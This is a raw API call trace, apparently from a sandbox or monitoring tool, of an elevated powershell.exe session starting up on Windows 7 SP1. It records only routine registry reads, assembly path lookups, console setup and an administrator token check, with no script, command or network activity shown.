	[0447.427] VerQueryValueW (in: pBlock=0x2b49670, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x22df78, puLen=0x22df70 | out: lplpBuffer=0x22df78*=0x0, puLen=0x22df70) returned 0
	[0447.427] VerQueryValueW (in: pBlock=0x2b49670, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x22df48, puLen=0x22df40 | out: lplpBuffer=0x22df48*=0x2b4970c, puLen=0x22df40) returned 1
	[0447.427] CoTaskMemAlloc (cb=0x204) returned 0x3b9bb0
	[0447.427] VerLanguageNameW (in: wLang=0x0, szLang=0x3b9bb0, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0447.427] CoTaskMemFree (pv=0x3b9bb0) 
	[0447.427] VerQueryValueW (in: pBlock=0x2b49670, lpSubBlock="\\", lplpBuffer=0x22df98, puLen=0x22df90 | out: lplpBuffer=0x22df98*=0x2b49698, puLen=0x22df90) returned 1
	[0447.436] CoTaskMemAlloc (cb=0x104) returned 0x3eace0
	[0447.436] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3eace0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0447.436] CoTaskMemFree (pv=0x3eace0) 
	[0447.441] CoTaskMemAlloc (cb=0x104) returned 0x3eace0
	[0447.441] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3eace0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0447.441] CoTaskMemFree (pv=0x3eace0) 
	[0447.446] lstrlenW (lpString="䅁") returned 1
	[0447.454] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x22de68 | out: phkResult=0x22de68*=0x30c) returned 0x0
	[0447.456] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="1", ulOptions=0x0, samDesired=0x20019, phkResult=0x22de58 | out: phkResult=0x22de58*=0x310) returned 0x0
	[0447.456] RegOpenKeyExW (in: hKey=0x310, lpSubKey="PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x22dee8 | out: phkResult=0x22dee8*=0x314) returned 0x0
	[0447.695] RegQueryValueExW (in: hKey=0x314, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x22de2c, lpData=0x0, lpcbData=0x22de28*=0x0 | out: lpType=0x22de2c*=0x1, lpData=0x0, lpcbData=0x22de28*=0x56) returned 0x0
	[0447.696] CoTaskMemAlloc (cb=0x5a) returned 0x3e2ed0
	[0447.696] RegQueryValueExW (in: hKey=0x314, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x22ddfc, lpData=0x3e2ed0, lpcbData=0x22ddf8*=0x56 | out: lpType=0x22ddfc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x22ddf8*=0x56) returned 0x0
	[0447.696] CoTaskMemFree (pv=0x3e2ed0) 
	[0447.701] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0447.703] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0447.709] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0447.739] CoTaskMemAlloc (cb=0x104) returned 0x3eace0
	[0447.739] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3eace0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0447.739] CoTaskMemFree (pv=0x3eace0) 
	[0449.559] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x22da20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0449.559] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x22da20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0450.532] CoTaskMemAlloc (cb=0x104) returned 0x3c7e90
	[0450.532] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c7e90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0450.532] CoTaskMemFree (pv=0x3c7e90) 
	[0450.534] CoTaskMemAlloc (cb=0x104) returned 0x3c7e90
	[0450.534] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c7e90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0450.534] CoTaskMemFree (pv=0x3c7e90) 
	[0450.833] CoTaskMemAlloc (cb=0x104) returned 0x3c7e90
	[0450.833] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c7e90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0450.833] CoTaskMemFree (pv=0x3c7e90) 
	[0450.834] CoTaskMemAlloc (cb=0x104) returned 0x3c7e90
	[0450.834] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c7e90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0450.834] CoTaskMemFree (pv=0x3c7e90) 
	[0450.835] CoTaskMemAlloc (cb=0x104) returned 0x3c7e90
	[0450.835] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c7e90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0450.835] CoTaskMemFree (pv=0x3c7e90) 
	[0451.451] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x22da20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0451.451] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x22da20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0451.891] CoTaskMemAlloc (cb=0x104) returned 0x3731a0
	[0451.891] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3731a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0451.891] CoTaskMemFree (pv=0x3731a0) 
	[0451.894] CoTaskMemAlloc (cb=0x104) returned 0x3731a0
	[0451.894] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3731a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0451.894] CoTaskMemFree (pv=0x3731a0) 
	[0452.182] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22da20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0452.183] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22da20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0455.379] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x22da20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0455.379] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x22da20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0456.158] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x22da20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0456.158] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x22da20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0457.920] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x22da20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0457.920] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x22da20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0459.802] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x22da20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0459.802] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x22da20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0460.305] CoTaskMemAlloc (cb=0x104) returned 0x1b39feb0
	[0460.305] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b39feb0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0460.305] CoTaskMemFree (pv=0x1b39feb0) 
	[0460.307] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x22dc20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0460.307] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x22db70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0460.307] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x22db70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0460.316] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x22db70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0461.339] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x22db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0461.339] SetErrorMode (uMode=0x1) returned 0x1
	[0461.339] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x22ddc0 | out: lpFileInformation=0x22ddc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0461.339] SetErrorMode (uMode=0x1) returned 0x1
	[0462.801] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x22dc20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0462.802] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x22db70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0462.802] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x22db70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0462.804] CoTaskMemAlloc (cb=0x104) returned 0x1b39cff0
	[0462.804] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b39cff0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0462.804] CoTaskMemFree (pv=0x1b39cff0) 
	[0462.808] CoTaskMemAlloc (cb=0x104) returned 0x1b39cff0
	[0462.808] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b39cff0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0462.808] CoTaskMemFree (pv=0x1b39cff0) 
	[0462.808] CoTaskMemAlloc (cb=0x104) returned 0x1b39cff0
	[0462.808] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b39cff0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0462.808] CoTaskMemFree (pv=0x1b39cff0) 
	[0462.811] CoCreateGuid (in: pguid=0x22e188 | out: pguid=0x22e188*(Data1=0x992d3f4, Data2=0x64b3, Data3=0x4c01, Data4=([0]=0xa4, [1]=0x28, [2]=0x20, [3]=0x9e, [4]=0x59, [5]=0xe7, [6]=0x65, [7]=0x34))) returned 0x0
	[0462.814] CoTaskMemAlloc (cb=0x104) returned 0x1b39cff0
	[0462.814] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b39cff0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0462.814] CoTaskMemFree (pv=0x1b39cff0) 
	[0463.262] CoTaskMemAlloc (cb=0x104) returned 0x1b39cff0
	[0463.262] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b39cff0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0463.262] CoTaskMemFree (pv=0x1b39cff0) 
	[0463.265] CoTaskMemAlloc (cb=0x104) returned 0x1b39cff0
	[0463.265] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b39cff0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0463.265] CoTaskMemFree (pv=0x1b39cff0) 
	[0463.272] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf
	[0463.273] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x22de30 | out: lpConsoleScreenBufferInfo=0x22de30) returned 1
	[0463.280] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13
	[0463.281] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0x22de30 | out: lpConsoleScreenBufferInfo=0x22de30) returned 1
	[0463.282] GetVersionExW (in: lpVersionInformation=0x22ddc0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x22ddc0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0463.285] GetCurrentProcess () returned 0xffffffffffffffff
	[0463.286] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x22de58 | out: TokenHandle=0x22de58*=0x1d8) returned 1
	[0463.290] GetTokenInformation (in: TokenHandle=0x1d8, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x22dd78 | out: TokenInformation=0x0, ReturnLength=0x22dd78) returned 0
	[0463.291] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x387310
	[0463.291] GetTokenInformation (in: TokenHandle=0x1d8, TokenInformationClass=0x8, TokenInformation=0x387310, TokenInformationLength=0x4, ReturnLength=0x22dd78 | out: TokenInformation=0x387310, ReturnLength=0x22dd78) returned 1
	[0463.292] DuplicateTokenEx (in: hExistingToken=0x1d8, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x22ded8 | out: phNewToken=0x22ded8*=0x1d0) returned 1
	[0463.292] GetTokenInformation (in: TokenHandle=0x1d8, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x22dd78 | out: TokenInformation=0x0, ReturnLength=0x22dd78) returned 0
	[0463.292] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x387340
	[0463.292] GetTokenInformation (in: TokenHandle=0x1d8, TokenInformationClass=0x8, TokenInformation=0x387340, TokenInformationLength=0x4, ReturnLength=0x22dd78 | out: TokenInformation=0x387340, ReturnLength=0x22dd78) returned 1
	[0463.292] CheckTokenMembership (in: TokenHandle=0x1d0, SidToCheck=0x2c24418*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x22dee8 | out: IsMember=0x22dee8) returned 1
	[0463.293] CloseHandle (hObject=0x1d0) returned 1
	[0463.853] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x22d940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0463.853] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x22d890, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0463.853] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x22d890, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0463.856] CoTaskMemAlloc (cb=0x804) returned 0x1b3a1eb0
	[0463.856] GetConsoleTitleW (in: lpConsoleTitle=0x1b3a1eb0, nSize=0x400 | out: lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x48
	[0463.856] CoTaskMemFree (pv=0x1b3a1eb0) 
	[0464.971] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x22d9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0464.971] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x22d900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0464.971] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x22d900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0464.971] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x22d900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0465.717] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x22d9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0465.717] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x22d900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0465.717] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x22d900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
